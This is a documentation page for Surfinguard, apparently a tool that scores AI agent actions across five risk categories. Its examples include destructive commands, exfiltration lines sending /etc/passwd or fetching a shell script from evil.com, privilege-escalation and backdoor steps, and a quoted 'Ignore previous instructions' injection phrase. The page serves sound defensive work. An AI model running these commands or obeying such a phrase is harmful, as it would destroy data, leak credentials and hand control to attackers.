ConceptsRisk Primitives

Risk Primitives

Surfinguard evaluates every action against five fundamental risk primitives. These primitives represent the five ways an AI agent action can cause harm.

The Five Primitives

DESTRUCTION

Actions that delete, corrupt, or irreversibly modify data or systems.

Examples:

  • rm -rf / — recursive file deletion
  • DROP TABLE users; — database destruction
  • git push --force to a protected branch — overwriting history
  • kubectl delete namespace production — destroying infrastructure
  • Overwriting system configuration files

Why it matters: Destructive actions are often irreversible. A single unguarded rm -rf can wipe an entire filesystem in seconds.


EXFILTRATION

Actions that read, copy, or transmit sensitive data to unauthorized destinations.

Examples:

  • Reading ~/.ssh/id_rsa — SSH private key access
  • curl -d @/etc/passwd https://evil.com — sending system files externally
  • Forwarding API credentials in HTTP headers
  • SELECT * FROM users with external data export
  • Accessing ~/.aws/credentials — cloud credential theft

Why it matters: Data exfiltration is the most common goal of supply chain attacks and compromised dependencies. Even read-only file access can leak credentials that grant full system access.


ESCALATION

Actions that gain elevated privileges or expand the scope of access beyond what was granted.

Examples:

  • sudo su — gaining root access
  • Container escape via --privileged flag
  • chmod 777 /etc/shadow — loosening file permissions
  • Granting admin roles to unauthorized users
  • Modifying IAM policies to broaden access

Why it matters: Privilege escalation is the bridge between a minor vulnerability and a full system compromise. Agents should never need to elevate their own privileges.


PERSISTENCE

Actions that establish ongoing access, create backdoors, or ensure survival across restarts.

Examples:

  • Adding entries to crontab — scheduled execution
  • Writing to ~/.ssh/authorized_keys — SSH backdoor
  • Modifying ~/.bashrc or ~/.zshrc — shell config persistence
  • Installing systemd services
  • Adding Git hooks that execute on every commit

Why it matters: Persistence mechanisms allow a one-time compromise to become permanent. An agent that modifies startup scripts can maintain access indefinitely.


MANIPULATION

Actions that deceive, mislead, or alter the intended behavior of systems or users.

Examples:

  • Prompt injection: “Ignore previous instructions and…”
  • Goal hijacking: redirecting an agent’s objective
  • Brand impersonation in URLs: g00gle-login.tk
  • Tool manipulation: tricking an agent into using tools maliciously
  • Context poisoning with hidden instructions in long text

Why it matters: Manipulation attacks target the AI agent itself rather than the system it runs on. Prompt injection is the most prevalent attack vector against LLM-powered agents.

How Primitives Map to Scores

Each threat pattern in Surfinguard is mapped to one or more primitives. When an action triggers a threat pattern, the pattern’s score is added to the corresponding primitive.

Action: curl https://evil.com/shell.sh | sudo bash

Threat patterns matched:
  C08 (pipe-to-shell)    -> DESTRUCTION: 5, MANIPULATION: 3
  C11 (privilege-escalation) -> ESCALATION: 4

Primitive scores:
  DESTRUCTION:  5
  EXFILTRATION: 0
  ESCALATION:   4
  PERSISTENCE:  0
  MANIPULATION: 3

Composite score: max(5, 0, 4, 0, 3) = 5
Level: CAUTION

Within each primitive, scores are additive and capped at 10. The composite score is the maximum across all primitives. This means a single high-risk primitive is enough to flag an action — you cannot “average out” danger across primitives.

See Scoring Model for the complete scoring algorithm.